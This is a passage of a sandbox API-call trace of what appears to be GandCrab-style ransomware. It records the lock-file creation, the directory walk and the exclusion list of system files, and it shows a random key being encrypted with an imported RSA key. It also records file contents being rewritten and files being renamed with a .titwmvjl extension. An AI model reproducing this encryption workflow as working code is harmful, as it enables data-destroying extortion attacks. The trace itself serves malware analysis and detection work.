x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.877] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0069.877] CloseHandle (hObject=0x2c4) returned 1 [0069.878] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.878] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.878] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0xc7)) [0069.878] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.878] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.879] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.879] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\d2ca4a09d2ca4deb61a.lock") returned 83 [0069.879] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\sonar\\sonar1.0\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0069.880] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.880] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.880] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\") returned 59 [0069.881] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\*" [0069.881] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x5034b8 [0069.881] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.881] FindNextFileW (in: hFindFile=0x5034b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.881] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.881] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.881] FindNextFileW (in: hFindFile=0x5034b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.881] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0069.881] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0069.881] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\d2ca4a09d2ca4deb61a.lock" [0069.881] lstrlenW (lpString=".titwmvjl") returned 9 [0069.881] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\d2ca4a09d2ca4deb61a.lock") returned 83 [0069.881] VirtualAlloc (lpAddress=0x0, dwSize=0xe6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.881] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 92 [0069.881] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\d2ca4a09d2ca4deb61a.lock") returned 83 [0069.881] lstrlenW (lpString=".lock") returned 5 [0069.881] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.881] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0069.882] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.882] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.882] FindNextFileW (in: hFindFile=0x5034b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.882] lstrcmpW (lpString1="sonar_policy.xml", lpString2=".") returned 1 [0069.882] lstrcmpW (lpString1="sonar_policy.xml", lpString2="..") returned 1 [0069.882] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\", lpString2="sonar_policy.xml" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml" [0069.882] lstrlenW (lpString=".titwmvjl") returned 9 [0069.882] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml") returned 75 [0069.882] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.882] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml.titwmvjl") returned 84 [0069.882] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml") returned 75 [0069.882] lstrlenW (lpString=".xml") returned 4 [0069.882] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.882] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".xml ") returned 5 [0069.883] lstrcmpiW (lpString1=".xml", lpString2=".titwmvjl") returned 1 [0069.883] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.883] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml") returned 75 [0069.883] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml") returned 75 [0069.883] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="desktop.ini") returned 1 [0069.883] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="autorun.inf") returned 1 [0069.883] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="ntuser.dat") returned 1 [0069.883] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="iconcache.db") returned 1 [0069.883] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="bootsect.bak") returned 1 [0069.883] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="boot.ini") returned 1 [0069.883] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="ntuser.dat.log") returned 1 [0069.883] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="thumbs.db") returned -1 [0069.883] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0069.883] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0069.883] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="KRAB-DECRYPT.html") returned 1 [0069.883] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="CRAB-DECRYPT.html") returned 1 [0069.883] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="KRAB-DECRYPT.txt") returned 1 [0069.883] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="CRAB-DECRYPT.txt") returned 1 [0069.883] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="ntldr") returned 1 [0069.883] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="NTDETECT.COM") returned 1 [0069.883] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="Bootfont.bin") returned 1 [0069.883] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml") returned 75 [0069.883] lstrlenW (lpString=".xml") returned 4 [0069.883] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.883] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".xml ") returned 5 [0069.883] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.884] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.884] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\sonar\\sonar1.0\\sonar_policy.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0069.885] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.885] ReadFile (in: hFile=0x2cc, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0069.887] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.887] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.887] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0069.887] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.888] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.888] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.888] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0069.888] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.888] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.888] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.888] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.889] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0069.889] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.889] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.889] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.889] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0069.890] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.890] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.890] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.890] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.890] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0069.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.891] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503538) returned 1 [0069.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.891] CryptGetKeyParam (in: hKey=0x503538, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0069.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.892] CryptEncrypt (in: hKey=0x503538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0069.892] GetLastError () returned 0x0 [0069.892] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.892] CryptDestroyKey (hKey=0x503538) returned 1 [0069.892] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.892] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.892] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.893] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0069.893] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.893] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503378) returned 1 [0069.893] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.894] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0069.894] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.894] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0069.894] GetLastError () returned 0x0 [0069.894] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.894] CryptDestroyKey (hKey=0x503378) returned 1 [0069.894] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.894] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.895] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0069.895] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0069.895] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x4949, lpOverlapped=0x0) returned 1 [0069.903] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xffffb6b7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.903] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x4949, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x4949, lpOverlapped=0x0) returned 1 [0069.905] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.905] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0069.907] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.911] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.911] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.911] CloseHandle (hObject=0x2cc) returned 1 [0069.913] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\sonar\\sonar1.0\\sonar_policy.xml"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\sonar\\sonar1.0\\sonar_policy.xml.titwmvjl"), dwFlags=0x1) returned 1 [0069.913] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.914] FindNextFileW (in: hFindFile=0x5034b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.914] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0069.914] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0069.914] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\TITWMVJL-DECRYPT.txt" [0069.914] lstrlenW (lpString=".titwmvjl") returned 9 [0069.914] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\TITWMVJL-DECRYPT.txt") returned 79 [0069.914] VirtualAlloc (lpAddress=0x0, dwSize=0xde, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.914] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 88 [0069.914] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\TITWMVJL-DECRYPT.txt") returned 79 [0069.914] lstrlenW (lpString=".txt") returned 4 [0069.914] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.914] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0069.914] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0069.914] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.914] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\TITWMVJL-DECRYPT.txt") returned 79 [0069.914] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\TITWMVJL-DECRYPT.txt") returned 79 [0069.914] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0069.915] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0069.915] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0069.915] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0069.915] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0069.915] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0069.915] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0069.915] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0069.915] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.915] FindNextFileW (in: hFindFile=0x5034b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0069.915] FindClose (in: hFindFile=0x5034b8 | out: hFindFile=0x5034b8) returned 1 [0069.916] CloseHandle (hObject=0x2c4) returned 1 [0069.916] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.916] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0069.916] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0069.916] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\TITWMVJL-DECRYPT.txt" [0069.916] lstrlenW (lpString=".titwmvjl") returned 9 [0069.916] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\TITWMVJL-DECRYPT.txt") returned 70 [0069.916] VirtualAlloc (lpAddress=0x0, dwSize=0xcc, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.916] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 79 [0069.916] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\TITWMVJL-DECRYPT.txt") returned 70 [0069.916] lstrlenW (lpString=".txt") returned 4 [0069.916] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.917] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0069.917] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0069.917] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.917] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\TITWMVJL-DECRYPT.txt") returned 70 [0069.917] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\TITWMVJL-DECRYPT.txt") returned 70 [0069.917] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0069.917] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 